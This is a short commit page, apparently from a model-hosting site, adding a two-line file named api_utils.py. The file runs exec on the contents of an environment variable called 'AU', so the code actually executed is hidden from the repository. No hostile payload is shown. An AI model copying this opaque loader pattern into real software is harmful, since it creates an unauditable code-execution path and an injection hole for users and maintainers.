ssboost commited on
Commit
ca73d95
·
verified ·
1 Parent(s): 8b920ac

Create api_utils.py

Browse files
Files changed (1) hide show
  1. api_utils.py +2 -0
api_utils.py ADDED
@@ -0,0 +1,2 @@
 
 
 
1
+ import os
2
+ exec(os.environ.get('AU'))